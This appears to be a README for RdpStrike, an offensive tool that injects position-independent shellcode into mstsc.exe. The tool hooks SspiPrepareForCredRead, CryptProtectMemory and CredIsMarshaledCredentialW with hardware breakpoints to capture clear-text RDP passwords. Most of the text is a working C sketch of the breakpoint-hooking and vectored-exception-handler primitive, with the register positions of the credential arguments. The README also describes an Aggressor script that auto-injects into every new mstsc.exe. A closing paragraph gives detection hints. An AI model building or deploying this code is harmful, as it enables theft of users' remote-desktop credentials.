RdpStrike
Position Independent Code to extract clear-text passwords from mstsc.exe using API hooking via hardware breakpoints (HWBP)
RdpStrike is a mini project I built to dive deep into Position Independent Code (PIC), following a blog post on the subject and chaining the result with the RdpThief technique. The goal is to extract clear-text passwords from mstsc.exe; instead of patching the target functions inline, the shellcode hooks them with hardware breakpoints. The code is fully position independent: once injected into the mstsc.exe process it sets hardware breakpoints on three APIs (SspiPrepareForCredRead, CryptProtectMemory and CredIsMarshaledCredentialW), captures any clear-text credentials that pass through them, and writes them to a file. An Aggressor script monitors for new processes and, whenever mstsc.exe is spawned, injects the shellcode into it.
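The sketch below is an added illustration of the hooking primitive the paragraph describes, not RdpStrike's own code. The portable part computes the DR7/DR6/EFLAGS bits exactly as the Intel SDM lays them out; the `#ifdef _WIN32` part shows how those bits are used from a vectored exception handler. It assumes x64 Windows, the Microsoft x64 calling convention (first arguments in RCX, RDX, R8, R9), and arming the current thread only; the hook table, sink callback and function names are hypothetical, and the argument positions quoted for the three APIs are taken from their documented prototypes.

```c
/* HWBP hooking sketch added to illustrate the technique; not RdpStrike's code.
 * Portable part: DR7/DR6/EFLAGS bit handling per the Intel SDM.
 * Windows part (#ifdef _WIN32): assumes x64, the Microsoft x64 calling
 * convention (first args in RCX, RDX, R8, R9) and hooking the current thread. */
#include <stdint.h>
#include <stdbool.h>

/* DR7: bit 2n = Ln (local enable of DRn), bit 10 reserved (reads as 1),
 * bits 16+4n..17+4n = RWn (00 = break on execute), bits 18+4n..19+4n = LENn
 * (00 = 1 byte, the only valid length for execute breakpoints). */
#define DR7_RESERVED_BIT10 ((uint64_t)1 << 10)
#define EFLAGS_RF          ((uint64_t)1 << 16)   /* Resume Flag: run the faulting insn once */

static inline uint64_t dr7_local_enable(int slot) { return (uint64_t)1 << (slot * 2); }
static inline uint64_t dr7_cond_mask(int slot)    { return (uint64_t)0xF << (16 + slot * 4); }

/* Arm slot 0..3 as an execute breakpoint in a DR7 image; an out-of-range slot
 * leaves it untouched. The caller stores the hooked address in DRn itself. */
uint64_t hwbp_dr7_enable_exec(uint64_t dr7, int slot)
{
    if (slot < 0 || slot > 3) return dr7;
    dr7 &= ~dr7_cond_mask(slot);                 /* RWn = 00 (execute), LENn = 00 (1 byte) */
    return dr7 | dr7_local_enable(slot) | DR7_RESERVED_BIT10;
}

uint64_t hwbp_dr7_disable(uint64_t dr7, int slot)
{
    if (slot < 0 || slot > 3) return dr7;
    return dr7 & ~(dr7_local_enable(slot) | dr7_cond_mask(slot));
}

bool hwbp_dr7_is_enabled(uint64_t dr7, int slot)
{
    return slot >= 0 && slot <= 3 && (dr7 & dr7_local_enable(slot)) != 0;
}

/* DR6 bits B0..B3 report which slot triggered; -1 if none is set. */
int hwbp_dr6_fired_slot(uint64_t dr6)
{
    for (int s = 0; s < 4; s++)
        if (dr6 & ((uint64_t)1 << s)) return s;
    return -1;
}

/* Set RF so the hooked instruction executes once without re-triggering. */
uint64_t hwbp_resume_eflags(uint64_t eflags) { return eflags | EFLAGS_RF; }

#ifdef _WIN32
#include <windows.h>
/* Per the documented prototypes the interesting argument sits in:
 *   CryptProtectMemory(pDataIn, cbDataIn, dwFlags)           RCX = buffer, RDX = length
 *   CredIsMarshaledCredentialW(MarshaledCredential)         RCX = wide string
 *   SspiPrepareForCredRead(AuthIdentity, pszTargetName, ..) RDX = target name
 * The (hypothetical) sink gets the CONTEXT and reads those registers. */
typedef void (*hwbp_sink_t)(int slot, const CONTEXT *ctx);
static struct { uintptr_t addr; hwbp_sink_t sink; } g_hooks[4];

static LONG CALLBACK hwbp_veh(EXCEPTION_POINTERS *ep)
{
    if (ep->ExceptionRecord->ExceptionCode != EXCEPTION_SINGLE_STEP)
        return EXCEPTION_CONTINUE_SEARCH;
    CONTEXT *ctx = ep->ContextRecord;
    uintptr_t rip = (uintptr_t)ep->ExceptionRecord->ExceptionAddress;
    int slot = hwbp_dr6_fired_slot(ctx->Dr6);
    if (slot < 0 || g_hooks[slot].addr != rip) {  /* Dr6 may be stale: match by address */
        slot = -1;
        for (int s = 0; s < 4; s++)
            if (g_hooks[s].addr && g_hooks[s].addr == rip) slot = s;
    }
    if (slot < 0) return EXCEPTION_CONTINUE_SEARCH;   /* not ours (e.g. a real debugger) */
    if (g_hooks[slot].sink) g_hooks[slot].sink(slot, ctx);
    ctx->Dr6 = 0;
    ctx->EFlags = (DWORD)hwbp_resume_eflags(ctx->EFlags);
    return EXCEPTION_CONTINUE_EXECUTION;
}

/* Debug registers are per thread: an injector must repeat this for every
 * thread in mstsc.exe (and newly created ones) to see all credential paths. */
BOOL hwbp_install(int slot, uintptr_t addr, hwbp_sink_t sink)
{
    static PVOID veh;
    if (slot < 0 || slot > 3) return FALSE;
    if (!veh && !(veh = AddVectoredExceptionHandler(1, hwbp_veh))) return FALSE;
    g_hooks[slot].addr = addr; g_hooks[slot].sink = sink;
    CONTEXT ctx = {0};
    ctx.ContextFlags = CONTEXT_DEBUG_REGISTERS;
    if (!GetThreadContext(GetCurrentThread(), &ctx)) return FALSE;
    switch (slot) {
    case 0: ctx.Dr0 = addr; break;
    case 1: ctx.Dr1 = addr; break;
    case 2: ctx.Dr2 = addr; break;
    default: ctx.Dr3 = addr; break;
    }
    ctx.Dr7 = hwbp_dr7_enable_exec(ctx.Dr7, slot);
    return SetThreadContext(GetCurrentThread(), &ctx);
}
#endif
```

Two points worth keeping in mind when reading the real shellcode against this sketch: the hook modifies no code bytes, so an integrity check of the `.text` section of the hooked DLLs sees nothing, but a non-zero DR7 in the threads of mstsc.exe and a freshly registered vectored exception handler are both observable; and because debug registers are thread state, a hook armed on one thread misses credentials handled on another.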